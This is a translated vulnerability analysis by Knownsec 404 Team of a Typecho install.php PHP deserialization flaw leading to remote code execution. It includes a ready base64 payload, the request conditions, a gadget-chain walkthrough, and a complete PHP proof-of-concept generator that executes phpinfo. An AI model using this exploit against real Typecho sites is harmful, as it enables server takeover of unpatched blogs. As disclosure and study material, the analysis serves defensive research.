Analysis of Typecho Front-end Getshell Vulnerability
Author: LoRexxar'@Knownsec 404 Team
Chinese version: https://paper.seebug.org/424/
0x01 Foreword
Typecho is a PHP Blogging Platform. Its database includes Mysql,PostgreSQL,SQLite and it is an open-source program under the GPL version 2 license. It uses SVN to do version synchronization.
On October 13, 2017, Typecho revealed a front-end code execution vulnerability. Knownsec 404 Team successfully made recurrence of this vulnerability.
Our security researchers confirmed that this vulnerability can execute code indefinitely and cause getshell.
0x02 Recurrence
Open Typecho
Generate the corresponding payload
YTo3OntzOjQ6Imhvc3QiO3M6OToibG9jYWxob3N0IjtzOjQ6InVzZXIiO3M6NjoieHh4eHh4IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo0OiJwb3J0IjtzOjQ6IjMzMDYiO3M6ODoiZGF0YWJhc2UiO3M6NzoidHlwZWNobyI7czo3OiJhZGFwdGVyIjtPOjEyOiJUeXBlY2hvX0ZlZWQiOjM6e3M6MTk6IgBUeXBlY2hvX0ZlZWQAX3R5cGUiO3M6NzoiUlNTIDIuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6NTp7czo0OiJsaW5rIjtzOjE6IjEiO3M6NToidGl0bGUiO3M6MToiMiI7czo0OiJkYXRlIjtpOjE1MDc3MjAyOTg7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fXM6ODoiY2F0ZWdvcnkiO2E6MTp7aTowO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fX19fXM6MTA6ImRhdGVGb3JtYXQiO047fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
Set the appropriate cookie and send the request
http://127.0.0.1/install.php?finish
phpinfo excuted
0x03 Analysis
The entry point of the vulnerability is in install.php. There are two judgments before entering install.php.
//Determine if it is installedif (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) {
exit;
}
// Block possible cross-site requests
if (!empty($_GET) || !empty($_POST)) {
if (empty($_SERVER['HTTP_REFERER'])) {
exit;
}
$parts = parse_url($_SERVER['HTTP_REFERER']);
if (!empty($parts['port'])) {
$parts['host'] = "{$parts['host']}:{$parts['port']}";
}
if (empty($parts['host']) || $_SERVER['HTTP_HOST'] != $parts['host']) {
exit;
}
}
Just pass the GET parameter finish and set the referer to the site URL.
Find the entry of the vulnerability - install.php line 232 to line 237
It seems clear that it is a deserialization vulnerability
The problem is how to use it. There should be corresponding magic methods. Only a few of them are more critical
__destruct()__wakeup()
__toString()
__destruct ()
is automatically called when the object is destroyed. __Wakeup
is automatically called when deserialization, and__toString ()
is automatically called when the object is called.
If the deserialization constructed is an array, and the adapter is set to a certain class, the __toString
method of the corresponding class can be triggered.
Looking for all toString methods, I only found one class method that can be used for the time being.
It is at line 223, /var/Typecho/Feed.php
Analyze the tostring function
Line 290 calls $ item ['author']-> screenName
, which is a private variable of the current class
Line 358 also calls the same variable, which should also be available here
A special magic method __get
is mentioned here.__Get
will be called when reading the value of an inaccessible property. We can set the item to call the __get
magic method at a certain location.
line 269 in /var/Typecho/Request.php may be the only __get
method available.
Follow the get function
Finally at line 159 applyFilter function
We found the call_user_func
function.
Trace the entire utilization chain - We can control the private variables in the Typecho_Request
class by settingitem ['author']
, so that both_filter
and _params ['screenName']
in the class can be controlled, so is the call_user_func
function variable, and the arbitrary code is executed.
Though we constructed the PoC according to all the processes above, the server returned 500 after we sent a request.
Review the code
At the beginning of install.php, ob_start ()
is called
The explanation of ob_start
on php.net is like this.
Because the object injection code above triggers the original exception, which causes ob_end_clean ()
to execute, the original output will be cleaned in the buffer.
We must think of a way to force exit so the original buffer data will be output.
Here are two ways.
1. Because the call_user_func
function is a loop, we can set the array to control the function to be excuted the second time, find an exit and the data in the buffer will be printed out.
2. Another method is to try to cause an error after the command is executed. The statement error will be forced to stop, and ew can get the data in the buffer.
After solving this problem, the entire ROP chain is established.
0x04 PoC
<?phpclass Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct()
{
// $this->_params['screenName'] = 'whoami';
$this->_params['screenName'] = -1;
$this->_filter[0] = 'phpinfo';
}
}
class Typecho_Feed
{
const RSS2 = 'RSS 2.0';
/ ** Define ATOM 1.0 type * /
????const ATOM1 = 'ATOM 1.0';
????/ ** Define RSS time format * /
????const DATE_RFC822 = 'r';
????/ ** Define ATOM time format * /
????const DATE_W3CDTF = 'c';
????/ ** Define line terminator * /
const EOL = "\n";
private $_type;
private $_items = array();
public $dateFormat;
public function __construct()
{
$this->_type = self::RSS2;
$item['link'] = '1';
$item['title'] = '2';
$item['date'] = 1507720298;
$item['author'] = new Typecho_Request();
$item['category'] = array(new Typecho_Request());
$this->_items[0] = $item;
}
}
$x = new Typecho_Feed();
$a = array(
'host' => 'localhost',
'user' => 'xxxxxx',
'charset' => 'utf8',
'port' => '3306',
'database' => 'typecho',
'adapter' => $x,
'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>
0x05 References
[2] Typecho github
[4] Typecho install.php deserialization resulting in arbitrary code execution
0x06 Postscript
We received analysis of the same vulnerability from p0 on October 25. Thank you for your submission.http://p0sec.net/index.php/archives/114/
以上是 Analysis of Typecho Front-end Getshell Vulnerability 的全部内容, 来源链接: utcz.com/p/199491.html